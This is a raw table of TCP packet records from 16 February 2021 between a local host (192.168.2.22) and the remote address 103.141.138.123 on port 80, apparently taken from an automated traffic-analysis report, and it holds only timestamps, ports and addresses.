Feb 16, 2021 07:02:46.682668924 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:46.682698011 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:46.682719946 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:46.682761908 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:46.682775974 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:46.682812929 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:46.906913042 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:46.906970978 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:46.907004118 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:46.907010078 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:46.907036066 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:46.907052994 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:46.907059908 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:46.907109976 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:46.907182932 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:46.907222986 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:46.907232046 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:46.907260895 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:46.907275915 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:46.907299995 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:46.907318115 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:46.907351971 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.128703117 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.128797054 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.128814936 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.128860950 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.128907919 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.128930092 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.128952026 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.128979921 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.129039049 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.129070044 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.129111052 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.129133940 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.129163980 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.129260063 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.129322052 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.129422903 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.129472017 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.129489899 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.129533052 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.129543066 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.129602909 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.129694939 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.129760027 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.129790068 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.129877090 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.129913092 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.129980087 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.130073071 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.130115986 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.130135059 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.130178928 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.130836964 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.350758076 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.350816965 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.350857019 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.350898981 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.350948095 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.350991964 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.351028919 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.351043940 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.351068974 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.351069927 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.351074934 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.351093054 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.351102114 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.351144075 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.351149082 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.351165056 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.351191998 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.351226091 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.351228952 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.351247072 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.351269007 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.351298094 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.351308107 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.351320028 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.351345062 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.351373911 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.351386070 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.351403952 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.351424932 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.351455927 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.351471901 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.351486921 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.351514101 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.351551056 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.351553917 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.351576090 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.351589918 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.351608992 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.351629019 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.351665974 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.351703882 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.351705074 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.351716995 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.351730108 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.351742983 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.351763964 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.351794004 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.351835966 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.351865053 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.351875067 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.351897955 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.351916075 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.351939917 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.351953983 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.351972103 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.351991892 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.352030993 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.352039099 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.352060080 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.352092981 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.352771044 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.573553085 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.573622942 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.573863029 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.573918104 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.573971033 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.574014902 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.574054003 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.574059010 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.574093103 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.574095964 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.574105978 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.574131012 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.574167967 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.574172020 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.574177980 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.574207067 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.574208021 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.574245930 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.574248075 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.574280977 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.574294090 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.574315071 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.574348927 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.574388027 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.574425936 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.574464083 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.574501038 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.574541092 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.574573040 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.574579954 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.574583054 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.574620008 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.574629068 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.574654102 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.574661016 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.574665070 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.574668884 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.574675083 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.574700117 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.574706078 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.574713945 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.574754000 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.574760914 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.574793100 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.574800014 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.574831963 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.574862957 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.574892998 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.574898958 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.574930906 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.574934959 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.574937105 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.574964046 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.574971914 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.575014114 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.575018883 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.575057030 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.575062037 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.575099945 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.575099945 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.575138092 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.575169086 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.575176954 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.575212955 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.575233936 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.575273037 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.575309038 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.575316906 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.575355053 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.575357914 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.575393915 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.575401068 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.575438976 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.575440884 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.575474977 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.575510025 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.575510025 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.575575113 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.575576067 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.575612068 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.575643063 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.575683117 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.575773954 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.575781107 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.575822115 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.575854063 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.575859070 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.575891972 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.575908899 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.575932026 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.575951099 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.576011896 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.576020002 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.576112032 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.576190948 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.586601973 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.587790012 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.796643019 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.796703100 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.796742916 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.796758890 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.796840906 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.796847105 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.797138929 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.797179937 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.797218084 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.797219992 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.797254086 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.797257900 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.797293901 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.797296047 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.797333956 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.797365904 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.798217058 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.798259974 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.798299074 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.798326969 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.798336983 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.798336029 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.798362017 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.798376083 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.798394918 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.798424959 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.798440933 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.798468113 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.798496008 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.798506021 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.798535109 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.798546076 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.798572063 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.798584938 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.798612118 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.798621893 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.798657894 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.798660040 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.798692942 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.798696995 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.798722982 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.798743963 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.798765898 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.798785925 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.798800945 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.798821926 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.798856020 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.798860073 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.798892021 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.798897982 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.798935890 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.798940897 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.798974037 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.798974991 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.799009085 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.799010992 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.799055099 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.799057961 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.799082041 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.799099922 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.799137115 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.799144983 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.799174070 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.799179077 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.799211025 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.799211979 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.799245119 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.799248934 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.799288034 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.799288988 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.799318075 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.799325943 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.799351931 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.799372911 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.799415112 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.799444914 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.799451113 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.799475908 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.799484015 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.799489975 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.799520969 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.799544096 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.799571991 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.799607038 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.803044081 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.808271885 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.808326006 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.808346033 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.808366060 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.808386087 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.808435917 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.808965921 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.809844971 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.809894085 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.809941053 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:47.809947014 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.809962034 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:47.810000896 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.022351027 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.022383928 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.022403955 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.022423983 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.022443056 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.022497892 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.022517920 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.022538900 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.022538900 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.022576094 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.022583961 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.022589922 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.022603989 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.022624969 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.022666931 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.022680998 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.022687912 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.022718906 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.022742987 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.022770882 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.022784948 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.022815943 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.022830963 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.022835970 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.022872925 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.022887945 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.022936106 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.022957087 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.024104118 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.024126053 CET	80	49167	103.141.138.123	192.168.2.22
